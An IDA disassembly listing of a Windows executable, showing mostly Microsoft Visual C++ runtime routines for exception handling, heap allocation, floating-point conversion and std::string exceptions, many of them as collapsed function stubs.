; [00000088 BYTES: COLLAPSED FUNCTION __umatherr. PRESS KEYPAD "+" TO EXPAND]
; [00000026 BYTES: COLLAPSED FUNCTION __set_errno. PRESS KEYPAD "+" TO EXPAND]
; [00000025 BYTES: COLLAPSED FUNCTION __get_fname. PRESS KEYPAD "+" TO EXPAND]
; [0000002D BYTES: COLLAPSED FUNCTION __errcode. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION __frnd. PRESS KEYPAD "+" TO EXPAND]
; [00000029 BYTES: COLLAPSED FUNCTION __set_exp. PRESS KEYPAD "+" TO EXPAND]
; [0000005A BYTES: COLLAPSED FUNCTION __sptype. PRESS KEYPAD "+" TO EXPAND]
; [000000C1 BYTES: COLLAPSED FUNCTION __decomp. PRESS KEYPAD "+" TO EXPAND]
; [0000000E BYTES: COLLAPSED FUNCTION __statfp. PRESS KEYPAD "+" TO EXPAND]
; [0000000F BYTES: COLLAPSED FUNCTION __clrfp. PRESS KEYPAD "+" TO EXPAND]
; [00000023 BYTES: COLLAPSED FUNCTION __ctrlfp. PRESS KEYPAD "+" TO EXPAND]
; [00000056 BYTES: COLLAPSED FUNCTION __set_statfp. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION __setdefaultprecision. PRESS KEYPAD "+" TO EXPAND]
; [0000003E BYTES: COLLAPSED FUNCTION __ms_p5_test_fdiv. PRESS KEYPAD "+" TO EXPAND]
; [00000029 BYTES: COLLAPSED FUNCTION __ms_p5_mp_test_fdiv. PRESS KEYPAD "+" TO EXPAND]
; [0000005A BYTES: COLLAPSED FUNCTION __forcdecpt. PRESS KEYPAD "+" TO EXPAND]
; [0000004E BYTES: COLLAPSED FUNCTION __cropzeros. PRESS KEYPAD "+" TO EXPAND]
; [00000018 BYTES: COLLAPSED FUNCTION __positive. PRESS KEYPAD "+" TO EXPAND]
; [0000003E BYTES: COLLAPSED FUNCTION __fassign. PRESS KEYPAD "+" TO EXPAND]
; [00000104 BYTES: COLLAPSED FUNCTION __cftoe. PRESS KEYPAD "+" TO EXPAND]
; [000000DE BYTES: COLLAPSED FUNCTION __cftof. PRESS KEYPAD "+" TO EXPAND]
; [0000009B BYTES: COLLAPSED FUNCTION __cftog. PRESS KEYPAD "+" TO EXPAND]
; [00000027 BYTES: COLLAPSED FUNCTION __cftoe_g. PRESS KEYPAD "+" TO EXPAND]
; [00000023 BYTES: COLLAPSED FUNCTION __cftof_g. PRESS KEYPAD "+" TO EXPAND]
; [00000051 BYTES: COLLAPSED FUNCTION __cfltcvt. PRESS KEYPAD "+" TO EXPAND]
; [00000025 BYTES: COLLAPSED FUNCTION __shift. PRESS KEYPAD "+" TO EXPAND]
; [0000009B BYTES: COLLAPSED FUNCTION ___InternalCxxFrameHandler. PRESS KEYPAD "+" TO EXPAND]
; [000001A7 BYTES: COLLAPSED FUNCTION FindHandler(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,void *,_s_FuncInfo const *,uchar,int,EHRegistrationNode *). PRESS KEYPAD "+" TO EXPAND]
; [000000A8 BYTES: COLLAPSED FUNCTION FindHandlerForForeignException(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,void *,_s_FuncInfo const *,int,int,EHRegistrationNode *). PRESS KEYPAD "+" TO EXPAND]
; [0000005D BYTES: COLLAPSED FUNCTION TypeMatch(_s_HandlerType const *,_s_CatchableType const *,_s_ThrowInfo const *). PRESS KEYPAD "+" TO EXPAND]
; [0000009E BYTES: COLLAPSED FUNCTION ___FrameUnwindToState. PRESS KEYPAD "+" TO EXPAND]
; [00000016 BYTES: COLLAPSED FUNCTION unknown_libname_4. PRESS KEYPAD "+" TO EXPAND]
; [0000007B BYTES: COLLAPSED FUNCTION CatchIt(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,void *,_s_FuncInfo const *,_s_HandlerType const *,_s_CatchableType const *,_s_TryBlockMapEntry const *,int,EHRegistrationNode *,uchar). PRESS KEYPAD "+" TO EXPAND]
; [0000009C BYTES: COLLAPSED FUNCTION CallCatchBlock(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,_s_FuncInfo const *,void *,int,ulong). PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_422AC8 proc near ; DATA XREF: .rdata:004278C8�o
push dword ptr [ebp-14h] ; struct _EXCEPTION_POINTERS *
call ?ExFilterRethrow@@YAHPAU_EXCEPTION_POINTERS@@@Z ; ExFilterRethrow(_EXCEPTION_POINTERS *)
pop ecx
retn
sub_422AC8 endp
; =============== S U B R O U T I N E =======================================
sub_422AD2 proc near ; DATA XREF: .rdata:004278CC�o
mov esp, [ebp-18h]
and dword ptr [ebp-2Ch], 0
push 0FFFFFFFFh
lea eax, [ebp-10h]
push eax
call __local_unwind2
pop ecx
pop ecx
xor eax, eax
jmp short loc_422AB9
sub_422AD2 endp
; =============== S U B R O U T I N E =======================================
sub_422AEA proc near ; DATA XREF: .rdata:004278C0�o
xor ebx, ebx
mov esi, [ebp+0Ch]
mov edi, [ebp+8]
sub_422AEA endp ; sp-analysis failed
; [00000046 BYTES: COLLAPSED FUNCTION sub_422AF2. PRESS KEYPAD "+" TO EXPAND]
; [0000002A BYTES: COLLAPSED FUNCTION ExFilterRethrow(_EXCEPTION_POINTERS *). PRESS KEYPAD "+" TO EXPAND]
; [000001B8 BYTES: COLLAPSED FUNCTION BuildCatchObject(EHExceptionRecord *,EHRegistrationNode *,_s_HandlerType const *,_s_CatchableType const *). PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
jmp sub_422DFC
; [00000056 BYTES: COLLAPSED FUNCTION unknown_libname_5. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
xor eax, eax
cmp [ebp+0Ch], al
setnz al
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
jmp sub_422DFC
; [00000023 BYTES: COLLAPSED FUNCTION AdjustPointer(void *,PMD const &). PRESS KEYPAD "+" TO EXPAND]
; [0000004C BYTES: COLLAPSED FUNCTION unknown_libname_6. PRESS KEYPAD "+" TO EXPAND]
; [00000056 BYTES: COLLAPSED FUNCTION sub_422DFC. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_422E52 proc near ; CODE XREF: _GetRangeOfTrysToCheck(_s_FuncInfo const *,int,int,uint *,uint *)+23�p
; _GetRangeOfTrysToCheck(_s_FuncInfo const *,int,int,uint *,uint *):loc_41D53E�p ...
var_18 = dword ptr -18h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_427908
push offset unknown_libname_8 ; Microsoft VisualC 2-8/net runtime
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_4], 0
mov eax, off_43D444
test eax, eax
jz short loc_422E9A
mov [ebp+var_4], 1
call eax ; sub_422DFC
jmp short loc_422E96
; ---------------------------------------------------------------------------
loc_422E8F: ; DATA XREF: .rdata:00427918�o
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_422E93: ; DATA XREF: .rdata:0042791C�o
mov esp, [ebp+var_18]
loc_422E96: ; CODE XREF: sub_422E52+3B�j
and [ebp+var_4], 0
loc_422E9A: ; CODE XREF: sub_422E52+30�j
or [ebp+var_4], 0FFFFFFFFh
call $+5
loc_422EA3: ; DATA XREF: .rdata:00427910�o
jmp sub_422DFC
sub_422E52 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422EA8 proc near ; CODE XREF: __onexit+7�p __onexit+26�p
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, dword_4DD388
push esi
cmp eax, 3
jnz short loc_422ED1
mov esi, [ebp+arg_0]
push esi
call ___sbh_find_block
test eax, eax
pop ecx
jz short loc_422ECE
mov eax, [esi-4]
sub eax, 9
jmp short loc_422F06
; ---------------------------------------------------------------------------
loc_422ECE: ; CODE XREF: sub_422EA8+1C�j
push esi
jmp short loc_422EF8
; ---------------------------------------------------------------------------
loc_422ED1: ; CODE XREF: sub_422EA8+E�j
cmp eax, 2
jnz short loc_422EF5
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push eax
push [ebp+arg_0]
call sub_41F472
add esp, 0Ch
test eax, eax
jz short loc_422EF5
movzx eax, byte ptr [eax]
shl eax, 4
jmp short loc_422F06
; ---------------------------------------------------------------------------
loc_422EF5: ; CODE XREF: sub_422EA8+2C�j
; sub_422EA8+43�j
push [ebp+arg_0]
loc_422EF8: ; CODE XREF: sub_422EA8+27�j
push 0
push dword_4DD384
call ds:dword_42704C ; RtlSizeHeap
loc_422F06: ; CODE XREF: sub_422EA8+24�j
; sub_422EA8+4B�j
pop esi
leave
retn
sub_422EA8 endp
; [0000009A BYTES: COLLAPSED FUNCTION __lseek. PRESS KEYPAD "+" TO EXPAND]
; [00000158 BYTES: COLLAPSED FUNCTION _ftell. PRESS KEYPAD "+" TO EXPAND]
; [000001AD BYTES: COLLAPSED FUNCTION __write. PRESS KEYPAD "+" TO EXPAND]
; [00000224 BYTES: COLLAPSED FUNCTION ___crtLCMapStringA. PRESS KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION _strncnt. PRESS KEYPAD "+" TO EXPAND]
; [00000141 BYTES: COLLAPSED FUNCTION __XcptFilter. PRESS KEYPAD "+" TO EXPAND]
; [00000043 BYTES: COLLAPSED FUNCTION _xcptlookup. PRESS KEYPAD "+" TO EXPAND]
; [00000058 BYTES: COLLAPSED FUNCTION __wincmdln. PRESS KEYPAD "+" TO EXPAND]
; [000000B9 BYTES: COLLAPSED FUNCTION __setenvp. PRESS KEYPAD "+" TO EXPAND]
; [00000099 BYTES: COLLAPSED FUNCTION __setargv. PRESS KEYPAD "+" TO EXPAND]
; [000001B4 BYTES: COLLAPSED FUNCTION _parse_cmdline. PRESS KEYPAD "+" TO EXPAND]
; [00000132 BYTES: COLLAPSED FUNCTION ___crtGetEnvironmentStringsA. PRESS KEYPAD "+" TO EXPAND]
; [000001AB BYTES: COLLAPSED FUNCTION __ioinit. PRESS KEYPAD "+" TO EXPAND]
align 4
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; [000000BD BYTES: COLLAPSED FUNCTION unknown_libname_8. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
unknown_libname_9: ; Microsoft VisualC 2-8/net runtime
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call __local_unwind2
add esp, 8
pop ebp
retn 4
; [00000039 BYTES: COLLAPSED FUNCTION __FF_MSGBANNER. PRESS KEYPAD "+" TO EXPAND]
; [00000153 BYTES: COLLAPSED FUNCTION __NMSG_WRITE. PRESS KEYPAD "+" TO EXPAND]
; [00000095 BYTES: COLLAPSED FUNCTION __alloc_osfhnd. PRESS KEYPAD "+" TO EXPAND]
; [00000077 BYTES: COLLAPSED FUNCTION __set_osfhnd. PRESS KEYPAD "+" TO EXPAND]
; [0000007A BYTES: COLLAPSED FUNCTION __free_osfhnd. PRESS KEYPAD "+" TO EXPAND]
; [0000003D BYTES: COLLAPSED FUNCTION __get_osfhandle. PRESS KEYPAD "+" TO EXPAND]
; [00000057 BYTES: COLLAPSED FUNCTION __commit. PRESS KEYPAD "+" TO EXPAND]
; [000000A5 BYTES: COLLAPSED FUNCTION ___initstdio. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION ___endstdio. PRESS KEYPAD "+" TO EXPAND]
; [00000044 BYTES: COLLAPSED FUNCTION __getbuf. PRESS KEYPAD "+" TO EXPAND]
; [000002B9 BYTES: COLLAPSED FUNCTION __sopen. PRESS KEYPAD "+" TO EXPAND]
; [00000149 BYTES: COLLAPSED FUNCTION ___crtGetStringTypeA. PRESS KEYPAD "+" TO EXPAND]
; [00000026 BYTES: COLLAPSED FUNCTION __isatty. PRESS KEYPAD "+" TO EXPAND]
; [00000068 BYTES: COLLAPSED FUNCTION _wctomb. PRESS KEYPAD "+" TO EXPAND]
; [000000C8 BYTES: COLLAPSED FUNCTION _mbtowc. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001F BYTES: COLLAPSED FUNCTION __allshl. PRESS KEYPAD "+" TO EXPAND]
; [0000006E BYTES: COLLAPSED FUNCTION _ungetc. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_42482D proc near ; CODE XREF: __umatherr+52�p
xor eax, eax
retn
sub_42482D endp
; [00000035 BYTES: COLLAPSED FUNCTION __control87. PRESS KEYPAD "+" TO EXPAND]
; [00000016 BYTES: COLLAPSED FUNCTION __controlfp. PRESS KEYPAD "+" TO EXPAND]
; [00000092 BYTES: COLLAPSED FUNCTION __abstract_cw. PRESS KEYPAD "+" TO EXPAND]
; [00000089 BYTES: COLLAPSED FUNCTION __hw_cw. PRESS KEYPAD "+" TO EXPAND]
; [00000049 BYTES: COLLAPSED FUNCTION __ZeroTail. PRESS KEYPAD "+" TO EXPAND]
; [00000056 BYTES: COLLAPSED FUNCTION __IncMan. PRESS KEYPAD "+" TO EXPAND]
; [0000008C BYTES: COLLAPSED FUNCTION __RoundMan. PRESS KEYPAD "+" TO EXPAND]
; [0000001B BYTES: COLLAPSED FUNCTION __CopyMan. PRESS KEYPAD "+" TO EXPAND]
; [0000000C BYTES: COLLAPSED FUNCTION __FillZeroMan. PRESS KEYPAD "+" TO EXPAND]
; [0000001B BYTES: COLLAPSED FUNCTION __IsZeroMan. PRESS KEYPAD "+" TO EXPAND]
; [0000008D BYTES: COLLAPSED FUNCTION __ShrMan. PRESS KEYPAD "+" TO EXPAND]
; [0000016C BYTES: COLLAPSED FUNCTION __ld12cvt. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_424CFC proc near ; CODE XREF: sub_424D28+23�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_43D7F8
push [esp+4+arg_4]
push [esp+8+arg_0]
call __ld12cvt
add esp, 0Ch
retn
sub_424CFC endp
; =============== S U B R O U T I N E =======================================
sub_424D12 proc near ; CODE XREF: sub_424D55+23�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_43D810
push [esp+4+arg_4]
push [esp+8+arg_0]
call __ld12cvt
add esp, 0Ch
retn
sub_424D12 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424D28 proc near ; CODE XREF: __fassign+12�p
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_C]
push eax
call ___strgtold12
push [ebp+arg_0]
lea eax, [ebp+var_C]
push eax
call sub_424CFC
add esp, 24h
leave
retn
sub_424D28 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424D55 proc near ; CODE XREF: __fassign+2D�p
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_C]
push eax
call ___strgtold12
push [ebp+arg_0]
lea eax, [ebp+var_C]
push eax
call sub_424D12
add esp, 24h
leave
retn
sub_424D55 endp
; [00000077 BYTES: COLLAPSED FUNCTION __fptostr. PRESS KEYPAD "+" TO EXPAND]
; [00000064 BYTES: COLLAPSED FUNCTION __fltout. PRESS KEYPAD "+" TO EXPAND]
; [000000B6 BYTES: COLLAPSED FUNCTION ___dtold. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push 2
call __amsg_exit
pop ecx
retn
; [00000046 BYTES: COLLAPSED FUNCTION __CxxUnhandledExceptionFilter(_EXCEPTION_POINTERS *). PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_424F62 proc near ; DATA XREF: .data:00429024�o
push offset ?__CxxUnhandledExceptionFilter@@YGJPAU_EXCEPTION_POINTERS@@@Z ; __CxxUnhandledExceptionFilter(_EXCEPTION_POINTERS *)
call ds:dword_427010 ; SetUnhandledExceptionFilter
mov dword_4DBFE8, eax
retn
sub_424F62 endp
; =============== S U B R O U T I N E =======================================
sub_424F73 proc near ; DATA XREF: .data:0042903C�o
push dword_4DBFE8
call ds:dword_427010 ; SetUnhandledExceptionFilter
retn
sub_424F73 endp
; =============== S U B R O U T I N E =======================================
sub_424F80 proc near ; CODE XREF: FindHandler(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,void *,_s_FuncInfo const *,uchar,int,EHRegistrationNode *)+6B�p
; BuildCatchObject(EHExceptionRecord *,EHRegistrationNode *,_s_HandlerType const *,_s_CatchableType const *)+61�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push 1
pop esi
push [esp+4+arg_4]
push [esp+8+arg_0]
call ds:dword_42700C ; IsBadReadPtr
test eax, eax
jz short loc_424F98
xor esi, esi
loc_424F98: ; CODE XREF: sub_424F80+14�j
mov eax, esi
pop esi
retn
sub_424F80 endp
; =============== S U B R O U T I N E =======================================
sub_424F9C proc near ; CODE XREF: BuildCatchObject(EHExceptionRecord *,EHRegistrationNode *,_s_HandlerType const *,_s_CatchableType const *)+73�p
; BuildCatchObject(EHExceptionRecord *,EHRegistrationNode *,_s_HandlerType const *,_s_CatchableType const *)+BF�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push 1
pop esi
push [esp+4+arg_4]
push [esp+8+arg_0]
call ds:dword_427060 ; IsBadWritePtr
test eax, eax
jz short loc_424FB4
xor esi, esi
loc_424FB4: ; CODE XREF: sub_424F9C+14�j
mov eax, esi
pop esi
retn
sub_424F9C endp
; [00000018 BYTES: COLLAPSED FUNCTION _ValidateExecute(int (*)(void)). PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [00000017 BYTES: COLLAPSED CHUNK OF FUNCTION sub_422DFC. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __ismbblead. PRESS KEYPAD "+" TO EXPAND]
; [00000031 BYTES: COLLAPSED FUNCTION _x_ismbbtype. PRESS KEYPAD "+" TO EXPAND]
; [00000089 BYTES: COLLAPSED FUNCTION ___crtMessageBoxA. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4250B2(size_t Size,int)
sub_4250B2 proc near ; CODE XREF: ___initstdio+22�p
; ___initstdio+3B�p
Size = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+Size]
imul esi, [ebp+arg_4]
cmp esi, 0FFFFFFE0h
push edi
mov [ebp+Size], esi
ja short loc_4250D3
test esi, esi
jnz short loc_4250CD
push 1
pop esi
loc_4250CD: ; CODE XREF: sub_4250B2+16�j
add esi, 0Fh
and esi, 0FFFFFFF0h
loc_4250D3: ; CODE XREF: sub_4250B2+12�j
; sub_4250B2+94�j
xor edi, edi
cmp esi, 0FFFFFFE0h
ja short loc_425132
mov eax, dword_4DD388
cmp eax, 3
jnz short loc_4250FE
mov eax, [ebp+Size]
cmp eax, dword_4DD380
ja short loc_42511D
push eax
call ___sbh_alloc_block
mov edi, eax
pop ecx
test edi, edi
jnz short loc_425148
jmp short loc_42511D
; ---------------------------------------------------------------------------
loc_4250FE: ; CODE XREF: sub_4250B2+30�j
cmp eax, 2
jnz short loc_42511D
cmp esi, dword_43CE74
ja short loc_42511D
mov eax, esi
shr eax, 4
push eax
call sub_41F50E
mov edi, eax
pop ecx
test edi, edi
jnz short loc_42515C
loc_42511D: ; CODE XREF: sub_4250B2+3B�j
; sub_4250B2+4A�j ...
push esi
push 8
push dword_4DD384
call ds:dword_427150 ; RtlAllocateHeap
mov edi, eax
test edi, edi
jnz short loc_425156
loc_425132: ; CODE XREF: sub_4250B2+26�j
cmp dword_4DBE48, 0
jz short loc_425156
push esi
call __callnewh
test eax, eax
pop ecx
jz short loc_42515F
jmp short loc_4250D3
; ---------------------------------------------------------------------------
loc_425148: ; CODE XREF: sub_4250B2+48�j
push [ebp+Size] ; Size
loc_42514B: ; CODE XREF: sub_4250B2+AB�j
push 0 ; Val
push edi ; Dst
call _memset
add esp, 0Ch
loc_425156: ; CODE XREF: sub_4250B2+7E�j
; sub_4250B2+87�j
mov eax, edi
loc_425158: ; CODE XREF: sub_4250B2+AF�j
pop edi
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_42515C: ; CODE XREF: sub_4250B2+69�j
push esi
jmp short loc_42514B
; ---------------------------------------------------------------------------
loc_42515F: ; CODE XREF: sub_4250B2+92�j
xor eax, eax
jmp short loc_425158
sub_4250B2 endp
; [00000058 BYTES: COLLAPSED FUNCTION __fcloseall. PRESS KEYPAD "+" TO EXPAND]
; [00000146 BYTES: COLLAPSED FUNCTION __chsize. PRESS KEYPAD "+" TO EXPAND]
; [00000021 BYTES: COLLAPSED FUNCTION ___addl. PRESS KEYPAD "+" TO EXPAND]
; [0000005E BYTES: COLLAPSED FUNCTION ___add_12. PRESS KEYPAD "+" TO EXPAND]
; [0000002E BYTES: COLLAPSED FUNCTION ___shl_12. PRESS KEYPAD "+" TO EXPAND]
; [0000002D BYTES: COLLAPSED FUNCTION ___shr_12. PRESS KEYPAD "+" TO EXPAND]
; [000000C7 BYTES: COLLAPSED FUNCTION ___mtold12. PRESS KEYPAD "+" TO EXPAND]
; [000004A1 BYTES: COLLAPSED FUNCTION ___strgtold12. PRESS KEYPAD "+" TO EXPAND]
off_425943 dd offset loc_42550C ; DATA XREF: ___strgtold12+63�r
dd offset loc_42555B ; jump table for switch statement
dd offset loc_4255B2
dd offset loc_4255DC
dd offset loc_425637
dd offset loc_4256AE
dd offset loc_4256E4
dd offset loc_42572E
dd offset loc_42570D
dd offset loc_425792
dd offset loc_42577C
dd offset loc_425748
; [00000293 BYTES: COLLAPSED FUNCTION _$I10_OUTPUT. PRESS KEYPAD "+" TO EXPAND]
; [0000012D BYTES: COLLAPSED FUNCTION _raise. PRESS KEYPAD "+" TO EXPAND]
; [00000045 BYTES: COLLAPSED FUNCTION _siglookup. PRESS KEYPAD "+" TO EXPAND]
; [00000076 BYTES: COLLAPSED FUNCTION __setmode. PRESS KEYPAD "+" TO EXPAND]
; [00000220 BYTES: COLLAPSED FUNCTION ___ld12mul. PRESS KEYPAD "+" TO EXPAND]
; [0000007C BYTES: COLLAPSED FUNCTION ___multtenpow12. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_426090(char *Src,int)
sub_426090 proc near ; CODE XREF: sub_426173+19�p
; sub_42629A+19�p
Src = dword ptr 4
push esi
push [esp+4+Src] ; Str
mov esi, ecx
xor eax, eax
mov [esi+4], eax
mov [esi+8], eax
mov [esi+0Ch], eax
call _strlen
pop ecx
push eax ; Size
push [esp+8+Src] ; Src
mov ecx, esi
call ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::assign(char const *,uint)
mov eax, esi
pop esi
retn 8
sub_426090 endp
; =============== S U B R O U T I N E =======================================
sub_4260BA proc near ; CODE XREF: sub_4260E2+3�p
; sub_426168+6�j ...
push esi
mov esi, ecx
push 1
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_427C90
call ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::_Tidy(bool)
mov ecx, esi
pop esi
jmp sub_426564
sub_4260BA endp
; [0000000D BYTES: COLLAPSED FUNCTION sub_4260D5. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_4260E2 proc near ; DATA XREF: .rdata:off_427C90�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_4260BA
test [esp+4+arg_0], 1
jz short loc_4260F8
push esi
call sub_41D65F
pop ecx
loc_4260F8: ; CODE XREF: sub_4260E2+D�j
mov eax, esi
pop esi
retn 4
sub_4260E2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4260FE proc near ; CODE XREF: sub_426173+29�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
mov eax, offset loc_426AE2
call __EH_prolog
push ecx
push ecx
push esi
lea eax, [ebp+var_10]
mov esi, ecx
push eax
mov [ebp+var_14], esi
mov [ebp+var_10], offset dword_427CAC
call ??0exception@@QAE@ABQBD@Z ; exception::exception(char const * const &)
push [ebp+arg_0]
and [ebp+var_4], 0
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_427C90
call sub_4261B0
mov ecx, [ebp+var_C]
mov dword ptr [esi], offset off_427CA0
mov eax, esi
pop esi
mov large fs:0, ecx
leave
retn 4
sub_4260FE endp
; =============== S U B R O U T I N E =======================================
sub_42614C proc near ; DATA XREF: .rdata:off_427CA0�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_426168
test [esp+4+arg_0], 1
jz short loc_426162
push esi
call sub_41D65F
pop ecx
loc_426162: ; CODE XREF: sub_42614C+D�j
mov eax, esi
pop esi
retn 4
sub_42614C endp
; =============== S U B R O U T I N E =======================================
sub_426168 proc near ; CODE XREF: sub_42614C+3�p
; DATA XREF: .rdata:00428014�o
mov dword ptr [ecx], offset off_427CA0
jmp sub_4260BA
sub_426168 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426173 proc near ; CODE XREF: std::basic_string<char,std::char_traits<char>,std::allocator<char>>::assign(std::basic_string<char,std::char_traits<char>,std::allocator<char>> const &,uint,uint)+13�p
; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::erase(uint,uint)+E�p
var_3C = byte ptr -3Ch
var_20 = byte ptr -20h
var_D = dword ptr -0Dh
var_4 = dword ptr -4
mov eax, offset loc_426AF4
call __EH_prolog
sub esp, 30h
lea eax, [ebp+var_D]
push eax ; int
push offset aInvalidStringP ; "invalid string position"
lea ecx, [ebp+var_20]
call sub_426090
and [ebp+var_4], 0
lea eax, [ebp+var_20]
push eax
lea ecx, [ebp+var_3C]
call sub_4260FE
push offset dword_428010
lea eax, [ebp+var_3C]
push eax
call __CxxThrowException@8 ; _CxxThrowException(x,x)
int 3 ; Trap to Debugger
sub_426173 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4261B0 proc near ; CODE XREF: sub_4260FE+32�p
; sub_4261D0+32�p ...
arg_0 = dword ptr 4
push esi
xor eax, eax
push 0FFFFFFFFh
mov esi, ecx
push eax
push [esp+0Ch+arg_0]
mov [esi+4], eax
mov [esi+8], eax
mov [esi+0Ch], eax
call ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::assign(std::basic_string<char,std::char_traits<char>,std::allocator<char>> const &,uint,uint)
mov eax, esi
pop esi
retn 4
sub_4261B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4261D0 proc near ; CODE XREF: sub_42629A+29�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
mov eax, offset loc_426B06
call __EH_prolog
push ecx
push ecx
push esi
lea eax, [ebp+var_10]
mov esi, ecx
push eax
mov [ebp+var_14], esi
mov [ebp+var_10], offset dword_427CAC
call ??0exception@@QAE@ABQBD@Z ; exception::exception(char const * const &)
push [ebp+arg_0]
and [ebp+var_4], 0
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_427C90
call sub_4261B0
mov ecx, [ebp+var_C]
mov eax, esi
pop esi
mov large fs:0, ecx
leave
retn 4
sub_4261D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426218 proc near ; CODE XREF: sub_426282+7�p
; sub_4262DE+7�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
mov eax, offset loc_426B18
call __EH_prolog
push ecx
push esi
push edi
mov edi, [ebp+arg_0]
mov esi, ecx
push edi
mov [ebp+var_10], esi
call ??0exception@@QAE@ABV0@@Z ; exception::exception(exception const &)
and [ebp+var_4], 0
add edi, 0Ch
push edi
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_427C90
call sub_4261B0
mov ecx, [ebp+var_C]
pop edi
mov eax, esi
pop esi
mov large fs:0, ecx
leave
retn 4
sub_426218 endp
; =============== S U B R O U T I N E =======================================
sub_42625B proc near ; DATA XREF: .rdata:off_427CCC�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_426277
test [esp+4+arg_0], 1
jz short loc_426271
push esi
call sub_41D65F
pop ecx
loc_426271: ; CODE XREF: sub_42625B+D�j
mov eax, esi
pop esi
retn 4
sub_42625B endp
; =============== S U B R O U T I N E =======================================
sub_426277 proc near ; CODE XREF: sub_42625B+3�p
; DATA XREF: .rdata:004280BC�o
